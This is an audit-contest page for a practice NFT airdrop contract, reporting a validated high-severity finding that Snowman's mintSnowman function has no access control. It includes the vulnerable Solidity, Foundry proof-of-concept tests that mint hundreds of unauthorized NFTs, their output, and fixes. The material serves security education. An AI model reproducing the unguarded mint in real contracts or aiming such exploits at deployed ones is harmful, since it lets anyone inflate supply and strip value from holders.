Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Snowman::mintSnowman has no access control - any caller mints unlimited NFTs for free

stecher007

Root + Impact

Description

mintSnowman is intended to be called only by the SnowmanAirdrop contract after it has verified a Merkle proof and the recipient's EIP-712 signature, so that one NFT is issued per unit of staked Snow.
The function is declared external with no access-control modifier and no check that the caller is the airdrop contract, so any account calls it directly and mints arbitrary NFTs to any address with no Snow, no proof, and no signature.

```solidity
// src/Snowman.sol
@> function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
@> _safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
```

Risk

Likelihood:

The function is permissionless and reachable from any externally-owned account in a single transaction; no special state, role, or timing is required.
Any caller bypasses the entire SnowmanAirdrop claim flow and calls it directly.

Impact:

Unlimited unauthorized minting of Snowman NFTs, destroying the scarcity and eligibility model of the airdrop.
The value of every legitimately-claimed NFT is diluted to zero.

Proof of Concept

The attacker is a random EOA — not the owner, not the airdrop. They call mintSnowman directly and receive NFTs with zero authorization:

```solidity
// test/HunterPoC_MintSnowman.t.sol — run: forge test --match-test test_anyone_can_mint -vvv
function test_anyone_can_mint_unlimited_snowman() public {
address attacker = makeAddr("attacker"); // not owner, not the airdrop
Snowman snowman = new Snowman("ipfs://snowman-svg");

assertEq(snowman.balanceOf(attacker), 0);

vm.prank(attacker);

snowman.mintSnowman(attacker, 100); // no Snow, no proof, no signature

assertEq(snowman.balanceOf(attacker), 100); // 100 NFTs minted for free

}
```

This test passes, proving any address mints unlimited NFTs for free.

Recommended Mitigation

Bind the airdrop address at deployment and restrict mintSnowman to it:

The root cause is the missing caller check. Storing the airdrop address as an immutable at construction and requiring msg.sender == i_airdrop ensures only the airdrop's verified claim flow (Merkle proof + signature) can mint, while preserving all existing minting logic. Alternatively, make Snowman Ownable and transfer ownership to the airdrop contract.

```diff

address private immutable i_airdrop;

constructor(string memory _svgUri) ERC721("Snowman", "SNOW") {

constructor(string memory _svgUri, address airdrop) ERC721("Snowman", "SNOW") {
i_airdrop = airdrop;
s_SnowmanSvgUri = _svgUri;
}

function mintSnowman(address receiver, uint256 amount) external {
if (msg.sender != i_airdrop) revert Snowman__OnlyAirdrop();
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
```

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 16 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!